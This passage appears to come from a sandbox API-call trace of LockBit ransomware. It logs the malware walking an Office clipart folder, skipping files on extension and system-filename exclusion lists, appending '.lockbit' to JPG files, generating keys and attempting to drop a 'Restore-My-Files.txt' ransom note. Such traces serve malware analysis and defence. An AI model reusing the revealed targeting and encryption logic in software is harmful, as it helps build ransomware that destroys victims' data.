lpString2=".JPG") returned 1 [0159.019] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG.lockbit") returned 72 [0159.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341475.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.021] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.021] malloc (_Size=0x40068) returned 0x3d70450 [0159.021] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=43490) returned 1 [0159.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.022] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.026] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.027] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.027] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.028] free (_Block=0x1fa2ed8) [0159.028] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.028] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.028] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ee3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341499.JPG", cAlternateFileName="")) returned 1 [0159.028] lstrcmpiW (lpString1=".", lpString2="J0341499.JPG") returned -1 [0159.028] lstrcmpiW (lpString1="..", lpString2="J0341499.JPG") returned -1 [0159.028] PathFindExtensionW (pszPath="J0341499.JPG") returned=".JPG" [0159.028] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.029] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.029] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.030] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.030] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.031] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.031] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.031] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.031] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.031] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.031] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.031] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.031] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.031] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341499.JPG") returned 1 [0159.031] lstrcmpiW (lpString1="ntldr", lpString2="J0341499.JPG") returned 1 [0159.031] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341499.JPG") returned 1 [0159.031] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341499.JPG") returned -1 [0159.031] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341499.JPG") returned -1 [0159.031] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341499.JPG") returned 1 [0159.031] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341499.JPG") returned -1 [0159.031] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.031] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG") returned=".JPG" [0159.031] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.032] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.032] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.032] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.032] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.033] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.033] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG.lockbit") returned 72 [0159.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341499.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0159.034] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.034] malloc (_Size=0x40068) returned 0x3f70048 [0159.034] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=16099) returned 1 [0159.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0159.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.036] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0159.036] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0159.041] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.041] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.041] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.043] free (_Block=0x1fa2ed8) [0159.043] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.043] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.043] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.043] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341534.JPG", cAlternateFileName="")) returned 1 [0159.043] lstrcmpiW (lpString1=".", lpString2="J0341534.JPG") returned -1 [0159.043] lstrcmpiW (lpString1="..", lpString2="J0341534.JPG") returned -1 [0159.043] PathFindExtensionW (pszPath="J0341534.JPG") returned=".JPG" [0159.043] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.043] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.043] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.043] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.043] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.043] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.043] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.043] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.043] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.044] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.044] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.045] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.045] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341534.JPG") returned 1 [0159.046] lstrcmpiW (lpString1="ntldr", lpString2="J0341534.JPG") returned 1 [0159.046] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341534.JPG") returned 1 [0159.046] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341534.JPG") returned -1 [0159.046] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341534.JPG") returned -1 [0159.046] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341534.JPG") returned 1 [0159.046] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341534.JPG") returned -1 [0159.046] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.046] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG") returned=".JPG" [0159.046] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.046] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.046] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.046] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.046] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.046] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.046] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.046] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.047] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.047] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.047] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.047] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.047] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.047] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.048] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.048] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG.lockbit") returned 72 [0159.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341534.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0159.050] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.050] malloc (_Size=0x40068) returned 0x3df0008 [0159.050] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8074) returned 1 [0159.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0159.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0159.051] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.058] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.058] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.059] free (_Block=0x1fa2ed8) [0159.060] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.060] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.060] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5a56, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341551.JPG", cAlternateFileName="")) returned 1 [0159.060] lstrcmpiW (lpString1=".", lpString2="J0341551.JPG") returned -1 [0159.060] lstrcmpiW (lpString1="..", lpString2="J0341551.JPG") returned -1 [0159.060] PathFindExtensionW (pszPath="J0341551.JPG") returned=".JPG" [0159.060] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.060] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.060] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.060] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.060] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.060] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.061] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.061] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.062] 